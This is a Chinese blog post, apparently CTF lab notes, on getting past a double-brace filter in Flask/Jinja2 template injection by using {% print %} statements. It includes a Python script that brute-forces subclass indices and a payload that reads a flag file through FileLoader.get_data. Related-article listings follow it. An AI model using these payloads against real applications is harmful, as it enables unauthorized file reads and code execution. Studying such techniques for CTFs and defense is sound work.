SSTI {{}} 双大括号 过滤绕过

已于 2023-08-31 01:16:52 修改
阅读量344 收藏 1
点赞数
分类专栏: ssti ctf web 文章标签: web安全 python 服务器 flask
于 2023-08-30 08:52:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73051164/article/details/132574970
版权

笔记主要学习内容来自 重庆橙子科技 SSTI模板注入

配合 docker 靶场 mcc0624/flask_ssti 食用效果更佳。

请添加图片描述

1. 控制语句 {%…%}

{{}}在 flask 中用于表示变量占位符,{% %} 在 flask 中则表示控制语句。
控制语句用来定义变量,循环,判断等来完成更加复杂的业务。其必须以 {% end... %} 结尾。

示例:

  • templates/index.html
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Flask Page</title>
</head>
<body>
    <ul>
        {% for girl in girls %}
        <li>Beautiful {{girl}}</li>
        {% endfor %}
    </ul>
</body>
</html>
  • app.py
from flask import Flask,render_template
app = Flask(__name__)

@app.route('/')
def show():
    girls = ['貂蝉','西施','甄姬','大乔','小乔']
    return render_template('index.html',girls = girls)
if __name__ == '__main__':
    app.run()

请添加图片描述

2. 绕过利用

{{}} 被过滤时,{%%} 若没有被过滤,就可以使用 {%%} 。一般情况下,{%%} 中的语句会被执行,但它并不会直接回显。使用 print 输出执行后的内容,就有回显了。

  • exp:
{%print("Hello SSTI!")%}

请添加图片描述

{% if 2>1 %}QING{% endif %}

请添加图片描述

{% if ''.__class__ %}ZQING{% endif %}

请添加图片描述

{% print(''.__class__.__mro__[-1]) %}

请添加图片描述

3. 过滤绕过

mcc0624/flask_ssti 过滤大括号 一关为例。
常规思路,先用脚本找关键文件读取类的索引值,在构造 payload 得到 flag 。

  • 脚本
import requests
url = input("请输入 URL:")
for i in range(500):
    # payload 中需要先初始化再列出所有全局变量
    data = {"code": "{%print(().__class__.__base__.__subclasses__()[" + str(i) + "])%}"}
    response = requests.post(url, data=data)
    if response.status_code == 200:
        if '_frozen_importlib_external.FileLoader' in response.text:
            print(i)

返回索引值 79,测试一下,没得问题~

请添加图片描述

  • payload
code={%print(().__class__.__base__.__subclasses__()[79]["get_data"](0,"flag"))%}

请添加图片描述

over~

By QING

至清.
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
fenjing工具,ssti
12-17
fenjing一把梭哈ssti,简单绕过waf
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过 .pdf
09-05
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过 安全人才 威胁情报 安全建设 安全开发 解决方案
全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip
08-20
全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip 全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip 全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip 全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip 全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip
flaskssti:测试SSTI
02-21
烧瓶
Flask SSTI/沙箱逃逸的一些总结
01-20
0x00 SSTI原理 ​ 模板注入,与SQL注入、命令注入等原理相似,都是用户的输入数据没有被合理的处理控制时,就有可能数据插入了程序段中成为程序的一部分,从而改变了程序的执行逻辑。 0x01 沙箱逃逸原理 沙盒/沙箱 ​ 沙箱在早期主要用于测试可疑软件、病毒危害程度等。在沙箱中运行,即使病毒对其造成严重危害,也不会威胁到真实环境。类似于虚拟机的利用。 内建函数 ​ 当启动python解释器时,即使没有创建任何变量或函数,还是会有很多函数可供使用,这些就是python的内建函数。 名称空间:从名称到对象的映射 1.内建名称空间:python自带名字,在解释器启动时产生,存放一些pytho
SSTI模板注入-中括号、args、下划线、单双引号、双大括号过滤绕过(ctfshow web入门368)
T1ngSh0w的博客
03-29 919
SSTI模板注入漏洞 中括号、args、下划线、单双引号、双大括号过滤 ctfshow web入门368
SSTI模块注入】SSTI+Flask+Python(下):绕过过滤
07-25 2518
SSTI绕过过滤
关于SSTI模块注入的常见绕过方法
Welcome To Myon'Blog !
07-05 991
1、过滤了中括号 2、过滤了双下划线 3、过滤了单下划线 4、过滤了点 5、过滤了大括号 6、过滤了引号 7、过滤了数字
SSTI简单总结和例题
Aiwin的博客
07-21 2587
SSTI简单总结和例题CISCN 2019华东南]Double Secret和[护网杯 2018]easy_tornado
SSTI入门详解
E1even的博客
03-15 4955
关于基于flask的SSTI漏洞的阶段学习小结: SSTI的理解: SSTI和SQL注入原理差不多,都是因为对输入的字符串控制不足,把输入的字符串当成命令执行。 SSTI引发的真正原因: render_template渲染函数的问题 render_template渲染函数是什么: 就是把HTML涉及的页面与用户数据分离开,这样方便展示和管理。当用户输入自己的数据信息,HTML页面可以根据用户自身的信息来展示页面,因此才有了这个函数的使用。 ...
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
SSTI
03-09
SSTI
命令执行RCE及其绕过详细总结(各情景下的绕过
2301_76690905的博客
12-12 4082
scandir() :将返回当前目录中的所有文件和目录的列表。返回的结果是一个数组,其中包含当前目录下的所有文件和目录名称(glob()可替换)localeconv() :返回一包含本地数字及货币格式信息的数组。(但是这里数组第一项就是‘.’,这个.的用处很大)current() :返回数组中的单元,默认取第一个值。pos()和current()是同一个东西getcwd() :取得当前工作目录dirname():函数返回路径中的目录部分。
实验室任务十
doubirui的博客
03-16 1477
SSTI(Server-Side Template Injection)从名字可以看出即是服务器端模板注入。比如python的flask、php的thinkphp、java的spring等框架一般都采用MVC的模式,用户的输入先进入Controller控制器,然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断,数据库存取,最后把结果返回给View视图层,经过模板渲染展示给用户。SSTI和SQL注入原理差不多,都是因为对输入的字符串控制不足,把输入的字符串当成命令执行。
[GDOUCTF 2023]<ez_ze> SSTI 过滤数字 大括号{等
m0_64180167的博客
10-31 811
ssti板块注入正好不会 {%%}的内容 学习一下经过测试 发现过滤了 {{}}那么我们就开始吧我们可以通过这个语句来查询是否存在ssti存在咯这里跟着师傅的wp走 他那边过滤了数字 我们也来看看。
SSTI模板注入-中括号、args、单双引号被过滤绕过(ctfshow web入门365)
T1ngSh0w的博客
03-28 1592
SSTI模板注入漏洞——中括号、单双引号、args被过滤。 ctfshow web入门365
SSTI模板注入绕过(进阶篇)
热门推荐
羽的博客
12-11 1万+
文章目录语法变量过滤器总结获取内置方法 以chr为例字符串构造获取键值或下标获取属性 下面的内容均以jinja2为例,根据官方文档来探寻绕过方法 文档链接 默认大家都已经可以利用没有任何过滤的模板注入 语法 官方文档对于模板的语法介绍如下 {% ... %} for Statements {{ ... }} for Expressions to print to the template output {# ... #} for Comments not included in the templat
ssti小总结
cuddlylm的博客
04-09 3093
漏洞简介 SSTI即服务端模版注入攻击。由于程序员代码编写不当,导致用户输入可以修改服务端模版的执行逻辑,从而造成XSS,任意文件读取,代码执行等一系列问题. 1. 几种常用于ssti的魔术方法 __class__ 返回类型所属的对象 __mro__ 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。 __base__ 返回该对象所继承的基类 // __base__和__mro__都是用来寻找基类的 __subclasses__ 每个新类都保留了子类的引用,这个方法返回一个类
基于拓扑漏洞分析的网络安全态势感知模型
最新发布
attack2001的专栏
06-07 576
漏洞态势分析是指通过获取网络系统中的漏洞信息、拓扑信息、攻击信息等,分析网络资产可能遭受的安全威胁以及预测攻击者利用漏洞可能发动的攻击,构建拓扑漏洞图,展示网络中可能存在的薄弱环节,以此来评估网络安全状态。在网络安全形势日益恶化的今天,如何快速有效地获取网络系统的安全状况、提高网络安全应对水平、增大网络安全的预警时间,成为网络空间安全领域研究的重要问题。网络漏洞态势感知研究存在的问题是缺乏有效的网络漏洞势数据采集和要素提取方法,使得网络资产漏洞态势的理解和分析计算难以进行。
ctfshow ssti
07-27
攻击者可以通过构造特定的输入来绕过应用程序的过滤机制,成功注入恶意代码,从而导致服务器端执行该代码。 为了防止SSTI漏洞,开发人员应该谨慎处理用户输入,并在解析模板时使用安全的方法,如使用模板引擎提供的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值